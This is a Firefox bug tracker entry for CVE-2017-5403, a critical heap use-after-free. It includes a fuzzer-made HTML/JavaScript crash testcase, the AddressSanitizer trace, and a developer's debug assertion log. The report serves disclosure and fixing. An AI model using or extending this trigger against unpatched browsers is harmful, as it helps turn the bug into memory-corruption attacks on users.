Closed Bug 1340186 (CVE-2017-5403) Opened 7 years ago Closed 7 years ago

heap-use-after-free in nsFrameManagerBase::UndisplayedMap::RemoveNodeFor

Categories

(Core :: DOM: Selection, defect)

Product:
Core
Component:
DOM: Selection
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
VERIFIED FIXED
Milestone:
mozilla54
Tracking Flags:
Tracking Status
firefox-esr45 - verified
firefox51 --- wontfix
firefox52 --- verified
firefox-esr52 52+ verified
firefox53 + verified
firefox54 + verified

People

(Reporter: nils, Assigned: MatsPalmgren_bugz)

Details

(4 keywords, Whiteboard: [fixed by cover bug 1341137][post-critsmash-triage][adv-main52+])

Attachments

(1 file)

domFuzzLite3.xpi
12.01 KB, application/x-xpinstall
Details 
The following testcase crashes the latest asan build of Firefox.

<script>
function start() {
        o0=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
        o0.src='data:text/html,<html><body><table><tr><td id=fo>xxx</td></tr></table></body></html>';
        o0.addEventListener('load', fun1,false);
        document.body.appendChild(o0);
        o1=window.document;
}
var called=0;
function fun1() {
        if(called++)return;
        o4=o0.contentDocument;
        o38=o4.getElementById('fo');
        o107=document.getSelection();
        o4.designMode='on';
        o213=new Blob([document.documentElement], {'type': 'text/html'});
        o0.src=window.URL.createObjectURL(o213);
        o1.designMode='on';
        o379=document.createElementNS('http://www.w3.org/1999/xhtml','textarea');
        o0.appendChild(o379);
        o462=document.createRange();
        o462.selectNode(o38);
        o107.addRange(o462);
        try{o1.execCommand('insertunorderedlist',false,null);}catch(e){}
        window.setTimeout(fun2, 4);
}
function fun2() {
        window.fuzzPriv.CC();window.fuzzPriv.GC();window.fuzzPriv.CC();
        window.setTimeout("location.reload()",500);
}
</script>
<body onload="start()"></body>

=================================================================
==24376==ERROR: AddressSanitizer: heap-use-after-free on address 0x6250003dd140 at pc 0x7fd00d89be4f bp 0x7ffc760e1470 sp 0x7ffc760e1468
READ of size 8 at 0x6250003dd140 thread T0 (Web Content)
    #0 0x7fd00d89be4e in RemoveChild /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:343:10
    #1 0x7fd00d89be4e in nsStyleContext::~nsStyleContext() /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:212
    #2 0x7fd00d8a6610 in nsStyleContext::Destroy() /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:1350:3
    #3 0x7fd00dabf6c3 in Release /home/worker/workspace/build/src/layout/style/nsStyleContext.h:130:7
    #4 0x7fd00dabf6c3 in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:40
    #5 0x7fd00dabf6c3 in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:394
    #6 0x7fd00dabf6c3 in ~RefPtr /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:78
    #7 0x7fd00dabf6c3 in mozilla::UndisplayedNode::~UndisplayedNode() /home/worker/workspace/build/src/layout/base/nsFrameManager.h:57
    #8 0x7fd00dabeb08 in nsFrameManagerBase::UndisplayedMap::RemoveNodeFor(nsIContent*, mozilla::UndisplayedNode*) /home/worker/workspace/build/src/layout/base/nsFrameManager.cpp:794:3
    #9 0x7fd00da77a25 in nsCSSFrameConstructor::ContentRemoved(nsIContent*, nsIContent*, nsIContent*, nsCSSFrameConstructor::RemoveFlags, bool*, nsIContent**) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:8320:5
    #10 0x7fd00d9d1f22 in mozilla::PresShell::ContentRemoved(nsIDocument*, nsIContent*, nsIContent*, int, nsIContent*) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4519:3
    #11 0x7fd00d4044ed in mozilla::HTMLEditor::DeleteRefToAnonymousNode(nsIContent*, nsIContent*, nsIPresShell*) /home/worker/workspace/build/src/editor/libeditor/HTMLAnonymousNodeEditor.cpp:298:7
    #12 0x7fd00d4078cf in RemoveListenerAndDeleteRef /home/worker/workspace/build/src/editor/libeditor/HTMLAnonymousNodeEditor.cpp:263:3
    #13 0x7fd00d4078cf in mozilla::HTMLEditor::HideResizers() /home/worker/workspace/build/src/editor/libeditor/HTMLEditorObjectResizer.cpp:429
    #14 0x7fd00d4967df in HideAnonymousEditingUIs /home/worker/workspace/build/src/editor/libeditor/HTMLEditor.cpp:187:5
    #15 0x7fd00d4967df in mozilla::HTMLEditor::PreDestroy(bool) /home/worker/workspace/build/src/editor/libeditor/HTMLEditor.cpp:341
    #16 0x7fd00ff98cb9 in TearDownEditor /home/worker/workspace/build/src/docshell/base/nsDocShellEditorData.cpp:35:5
    #17 0x7fd00ff98cb9 in nsDocShellEditorData::~nsDocShellEditorData() /home/worker/workspace/build/src/docshell/base/nsDocShellEditorData.cpp:28
    #18 0x7fd00ffc8b0e in assign /home/worker/workspace/build/src/obj-firefox/dist/include/nsAutoPtr.h:45:5
    #19 0x7fd00ffc8b0e in operator= /home/worker/workspace/build/src/obj-firefox/dist/include/nsAutoPtr.h:129
    #20 0x7fd00ffc8b0e in nsSHEntryShared::DropPresentationState() /home/worker/workspace/build/src/docshell/shistory/nsSHEntryShared.cpp:173
    #21 0x7fd00ffc6d66 in SyncPresentationState /home/worker/workspace/build/src/docshell/shistory/nsSHEntryShared.cpp:147:3
    #22 0x7fd00ffc6d66 in nsSHEntry::SyncPresentationState() /home/worker/workspace/build/src/docshell/shistory/nsSHEntry.cpp:848
    #23 0x7fd00ff5d6c3 in nsDocShell::SetupNewViewer(nsIContentViewer*) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9413:5
    #24 0x7fd00ff5c079 in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7247:17
    #25 0x7fd00feeeb36 in nsDocShell::CreateContentViewer(nsACString_internal const&, nsIRequest*, nsIStreamListener**) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9236:3
    #26 0x7fd00feebb0a in nsDSURIContentListener::DoContent(nsACString_internal const&, bool, nsIRequest*, nsIStreamListener**, bool*) /home/worker/workspace/build/src/docshell/base/nsDSURIContentListener.cpp:128:10
    #27 0x7fd008a9010d in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:736:17
    #28 0x7fd008a8c82e in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:414:30
    #29 0x7fd008a8b7a0 in nsDocumentOpenInfo::OnStartRequest(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:277:8
    #30 0x7fd00721525b in nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:813:14
    #31 0x7fd00726131e in nsInputStreamPump::OnStateStart() /home/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:524:14
    #32 0x7fd007260853 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /home/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:426:25
    #33 0x7fd00705194d in nsInputStreamReadyEvent::Run() /home/worker/workspace/build/src/xpcom/io/nsStreamUtils.cpp:96:9
    #34 0x7fd0070b4f59 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #35 0x7fd0070b1850 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #36 0x7fd007ec6acf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #37 0x7fd007e37c38 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #38 0x7fd007e37c38 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #39 0x7fd007e37c38 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #40 0x7fd00d26f4ff in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #41 0x7fd010a75997 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:852:12
    #42 0x7fd007e37c38 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #43 0x7fd007e37c38 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #44 0x7fd007e37c38 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #45 0x7fd010a7547c in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:684:7
    #46 0x4e00c6 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #47 0x4e00c6 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:284
    #48 0x7fd02245782f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #49 0x41c2e8 in _start (/home/nils/fuzzer3/firefox/firefox+0x41c2e8)

0x6250003dd140 is located 6208 bytes inside of 8192-byte region [0x6250003db900,0x6250003dd900)
freed by thread T0 (Web Content) here:
    #0 0x4b2a3b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7fd01fa35117 in FreeArenaList /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:195:9
    #2 0x7fd01fa35117 in PL_FinishArenaPool /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:222
    #3 0x7fd00d935eef in nsPresArena::~nsPresArena() /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:56:3
    #4 0x7fd00d9af120 in nsIPresShell::~nsIPresShell() /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:181:7
    #5 0x7fd00d9af2cd in mozilla::PresShell::~PresShell() /home/worker/workspace/build/src/layout/base/PresShell.cpp:898:1
    #6 0x7fd00d9aacf4 in mozilla::PresShell::Release() /home/worker/workspace/build/src/layout/base/PresShell.cpp:892:1
    #7 0x7fd00daac005 in assign_assuming_AddRef /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:334:7
    #8 0x7fd00daac005 in operator= /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:600
    #9 0x7fd00daac005 in nsDocumentViewer::DestroyPresShell() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:4586
    #10 0x7fd00da9b1bf in nsDocumentViewer::Destroy() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1715:5
    #11 0x7fd00daae0cd in nsDocumentViewer::Show() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2047:5
    #12 0x7fd00db38eaf in nsPresContext::EnsureVisible() /home/worker/workspace/build/src/layout/base/nsPresContext.cpp:2159:27
    #13 0x7fd00d9cc1da in mozilla::PresShell::UnsuppressAndInvalidate() /home/worker/workspace/build/src/layout/base/PresShell.cpp:3901:40
    #14 0x7fd00daa3c8c in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1078:7
    #15 0x7fd00ff64422 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7628:5
    #16 0x7fd00ff60214 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7426:7
    #17 0x7fd00ff67a9f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7323:13
    #18 0x7fd008a838e0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1256:3
    #19 0x7fd008a82878 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:841:5
    #20 0x7fd008a7f5d6 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:731:9
    #21 0x7fd008a816d4 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:613:5
    #22 0x7fd008a8228c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:469:14
    #23 0x7fd00726969b in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #24 0x7fd009ad1ffb in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8832:7
    #25 0x7fd009ad1b9b in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8758:9
    #26 0x7fd009aa7cfc in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5280:3
    #27 0x7fd009b821a2 in applyImpl<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
    #28 0x7fd009b821a2 in apply<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
    #29 0x7fd009b821a2 in mozilla::detail::RunnableMethodImpl<nsDocument*, void (nsDocument::*)(), true, false>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
    #30 0x7fd0070809d2 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:242:21
    #31 0x7fd0070b4f59 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #32 0x7fd0070b1850 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #33 0x7fd007ec6acf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #34 0x7fd007e37c38 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #35 0x7fd007e37c38 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #36 0x7fd007e37c38 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211

previously allocated by thread T0 (Web Content) here:
    #0 0x4b2d5b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x7fd01fa34a24 in PL_ArenaAllocate /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:127:27
    #2 0x7fd00d936731 in nsPresArena::Allocate(unsigned int, unsigned long) /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:165:3
    #3 0x7fd00d84ab7e in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsPresArena.h:65:12
    #4 0x7fd00d84ab7e in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsIPresShell.h:239
    #5 0x7fd00d84ab7e in operator new /home/worker/workspace/build/src/layout/style/nsStyleStruct.h:2803
    #6 0x7fd00d84ab7e in nsRuleNode::ComputeDisplayData(void*, nsRuleData const*, nsStyleContext*, nsRuleNode*, nsRuleNode::RuleDetail, mozilla::RuleNodeCacheConditions) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:5544
    #7 0x7fd00d8292f1 in nsRuleNode::WalkRuleTree(nsStyleStructID, nsStyleContext*) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:2638:10
    #8 0x7fd00905afd7 in nsStyleDisplay const* nsRuleNode::GetStyleDisplay<true>(nsStyleContext*) /home/worker/workspace/build/src/obj-firefox/dist/include/nsStyleStructList.h:98:1
    #9 0x7fd00d898413 in DoGetStyleDisplay<true> /home/worker/workspace/build/src/obj-firefox/layout/style/nsStyleStructList.h:98:1
    #10 0x7fd00d898413 in StyleDisplay /home/worker/workspace/build/src/obj-firefox/layout/style/nsStyleStructList.h:98
    #11 0x7fd00d898413 in nsStyleContext::SetStyleBits() /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:716
    #12 0x7fd00d897cc6 in FinishConstruction /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:171:3
    #13 0x7fd00d897cc6 in nsStyleContext::nsStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, already_AddRefed<nsRuleNode>, bool) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:129
    #14 0x7fd00d8a6989 in NS_NewStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, nsRuleNode*, bool) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:1368:5
    #15 0x7fd00d8c88ff in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:943:14
    #16 0x7fd00d8cd849 in nsStyleSet::ResolveStyleForInternal(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&, nsStyleSet::AnimationFlag) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1393:10
    #17 0x7fd00d8cd300 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1403:10
    #18 0x7fd00da5ec67 in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.h:135:12
    #19 0x7fd00da5ec67 in ResolveStyleFor /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/StyleSetHandleInlines.h:94
    #20 0x7fd00da5ec67 in nsCSSFrameConstructor::ResolveStyleContext(nsStyleContext*, nsIContent*, nsFrameConstructorState*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5037
    #21 0x7fd00da61ed0 in ResolveStyleContext /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5006:10
    #22 0x7fd00da61ed0 in ResolveStyleContext /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5022
    #23 0x7fd00da61ed0 in nsCSSFrameConstructor::AddFrameConstructionItems(nsFrameConstructorState&, nsIContent*, bool, nsCSSFrameConstructor::InsertionPoint const&, nsCSSFrameConstructor::FrameConstructionItemList&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:5654
    #24 0x7fd00da458e6 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10873:9
    #25 0x7fd00da59c97 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4061:9
    #26 0x7fd00da64986 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6189:3
    #27 0x7fd00da4ff55 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10685:5
    #28 0x7fd00da4ff55 in nsCSSFrameConstructor::BeginBuildingScrollFrame(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, nsIAtom*, bool, nsContainerFrame*&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4572
    #29 0x7fd00da4ca7b in nsCSSFrameConstructor::SetUpDocElementContainingBlock(nsIContent*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:2904:25
    #30 0x7fd00da4903c in nsCSSFrameConstructor::ConstructDocElementFrame(mozilla::dom::Element*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:2416:3
    #31 0x7fd00da6d959 in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7773:7
    #32 0x7fd00d9b5282 in mozilla::PresShell::Initialize(int, int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:1810:7
    #33 0x7fd009a0d161 in nsContentSink::StartLayout(bool) /home/worker/workspace/build/src/dom/base/nsContentSink.cpp:1237:19
    #34 0x7fd008c5c446 in nsHtml5TreeOpExecutor::StartLayout() /home/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:622:3
    #35 0x7fd008c686d9 in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) /home/worker/workspace/build/src/parser/html/nsHtml5TreeOperation.cpp:998:7
    #36 0x7fd008c59bd1 in nsHtml5TreeOpExecutor::RunFlushLoop() /home/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:457:21
    #37 0x7fd008c5e94b in nsHtml5ExecutorFlusher::Run() /home/worker/workspace/build/src/parser/html/nsHtml5StreamParser.cpp:128:9
    #38 0x7fd0070809d2 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:242:21
    #39 0x7fd0070b4f59 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #40 0x7fd0070b1850 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:343:10 in RemoveChild
Shadow bytes around the buggy address:
  0x0c4a800739d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800739e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800739f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80073a00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80073a10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c4a80073a20: fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd
  0x0c4a80073a30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80073a40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80073a50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80073a60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80073a70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==24376==ABORTING
Heycam, could you look at this? The test case involves a lot of editor stuff, but the stacks look very style-system-y. Thanks.
Flags: needinfo?(cam)
Keywords: csectype-uaf, sec-critical
In a debug build, we assert a bunch and crash earlier:

[28869] WARNING: NS_ENSURE_SUCCESS(rv, rv) failed with result 0x80004005: file /z/moz/b/editor/libeditor/HTMLEditRules.cpp, line 3344
[28869] ###!!! ASSERTION: Must have the same owner document: '(NODE_FROM(aParent, aDocument)->OwnerDoc() == OwnerDoc())', file /z/moz/b/dom/base/Element.cpp, line 1450
[28869] ###!!! ASSERTION: aDocument must be current doc of aParent: '!aParent || aDocument == aParent->GetUncomposedDoc()', file /z/moz/b/dom/base/Element.cpp, line 1452
[28869] ###!!! ASSERTION: must be in the same rule tree as parent: 'r1 == r2', file /z/moz/b/layout/style/nsStyleContext.cpp, line 122
[28869] ###!!! ASSERTION: must be in the same rule tree as parent: 'r1 == r2', file /z/moz/b/layout/style/nsStyleContext.cpp, line 122
[28869] ###!!! ASSERTION: Unexpected aDocument: 'aDocument == mDocument', file /z/moz/b/layout/base/PresShell.cpp, line 4354
[28869] ###!!! ASSERTION: Unexpected aDocument: 'aDocument == mDocument', file /z/moz/b/layout/base/PresShell.cpp, line 4377
[28869] ###!!! ASSERTION: Must have the same owner document: '(NODE_FROM(aParent, aDocument)->OwnerDoc() == OwnerDoc())', file /z/moz/b/dom/base/Element.cpp, line 1450
[28869] ###!!! ASSERTION: aDocument must be current doc of aParent: '!aParent || aDocument == aParent->GetUncomposedDoc()', file /z/moz/b/dom/base/Element.cpp, line 1452
...
[28869] ###!!! ASSERTION: GetOffsetTo called on frames in different documents: 'PresContext() == aOther->PresContext()', file /z/moz/b/layout/generic/nsFrame.cpp, line 5870
[28869] ###!!! ASSERTION: GetOffsetTo called on frames in different documents: 'PresContext() == aOther->PresContext()', file /z/moz/b/layout/generic/nsFrame.cpp, line 5870
...
Assertion failure: aPresContext == aFrame->PresContext() (wrong pres context), at /z/moz/b/layout/generic/ReflowInput.cpp:197
#0  0x00007fefda567408 in mozilla::ReflowInput::ReflowInput (this=0x7ffc1032c478, aPresContext=0x61a000275480, aParentReflowInput=..., aFrame=0x625000ddab90, aAvailableSpace=..., aContainingBlockSize=0x0, aFlags=0)
    at /z/moz/b/layout/generic/ReflowInput.cpp:197
#1  0x00007fefda52628b in mozilla::Maybe<mozilla::ReflowInput>::emplace<nsPresContext*&, mozilla::ReflowInput const&, nsIFrame*&, mozilla::LogicalSize&> (this=0x7ffc1032c470, aArgs=..., aArgs=..., aArgs=..., aArgs=...)
    at /z/moz/b/obj/dist/include/mozilla/Maybe.h:461
#2  0x00007fefda505427 in nsLineLayout::ReflowFrame (this=0x7ffc1032e800, aFrame=0x625000ddab90, aReflowStatus=@0x7ffc1032d7e0: 14532392, aMetrics=0x0, aPushedFrame=@0x7ffc1032d7f0: false) at /z/moz/b/layout/generic/nsLineLayout.cpp:879
#3  0x00007fefda6229ac in nsBlockFrame::ReflowInlineFrame (this=0x625000bad358, aState=..., aLineLayout=..., aLine=..., aFrame=0x625000ddab90, aLineReflowStatus=0x7ffc1032dc70) at /z/moz/b/layout/generic/nsBlockFrame.cpp:4151
#4  0x00007fefda62038a in nsBlockFrame::DoReflowInlineFrames (this=0x625000bad358, aState=..., aLineLayout=..., aLine=..., aFloatAvailableSpace=..., aAvailableSpaceBSize=@0x7ffc1032e7b0: 0, aFloatStateBeforeLine=0x7ffc1032e7e0, 
    aKeepReflowGoing=0x7ffc1032eda0, aLineReflowStatus=0x7ffc1032e7a0, aAllowPullUp=true) at /z/moz/b/layout/generic/nsBlockFrame.cpp:3952
#5  0x00007fefda611f1f in nsBlockFrame::ReflowInlineFrames (this=0x625000bad358, aState=..., aLine=..., aKeepReflowGoing=0x7ffc1032eda0) at /z/moz/b/layout/generic/nsBlockFrame.cpp:3826
#6  0x00007fefda60773e in nsBlockFrame::ReflowLine (this=0x625000bad358, aState=..., aLine=..., aKeepReflowGoing=0x7ffc1032eda0) at /z/moz/b/layout/generic/nsBlockFrame.cpp:2832
#7  0x00007fefda5f6523 in nsBlockFrame::ReflowDirtyLines (this=0x625000bad358, aState=...) at /z/moz/b/layout/generic/nsBlockFrame.cpp:2368
#8  0x00007fefda5ed070 in nsBlockFrame::Reflow (this=0x625000bad358, aPresContext=0x61a000275480, aMetrics=..., aReflowInput=..., aStatus=@0x7ffc10332bf0: 0) at /z/moz/b/layout/generic/nsBlockFrame.cpp:1237
#9  0x00007fefda61ad48 in nsBlockReflowContext::ReflowBlock (this=0x7ffc103325e0, aSpace=..., aApplyBStartMargin=true, aPrevMargin=..., aClearance=0, aIsAdjacentWithBStart=true, aLine=0x625000bad3f0, aFrameRI=..., 
    aFrameReflowStatus=@0x7ffc10332bf0: 0, aState=...) at /z/moz/b/layout/generic/nsBlockReflowContext.cpp:306
#10 0x00007fefda60e4df in nsBlockFrame::ReflowBlockFrame (this=0x625000bacc80, aState=..., aLine=..., aKeepReflowGoing=0x7ffc103341e0) at /z/moz/b/layout/generic/nsBlockFrame.cpp:3460
#11 0x00007fefda60766c in nsBlockFrame::ReflowLine (this=0x625000bacc80, aState=..., aLine=..., aKeepReflowGoing=0x7ffc103341e0) at /z/moz/b/layout/generic/nsBlockFrame.cpp:2829
#12 0x00007fefda5f6523 in nsBlockFrame::ReflowDirtyLines (this=0x625000bacc80, aState=...) at /z/moz/b/layout/generic/nsBlockFrame.cpp:2368
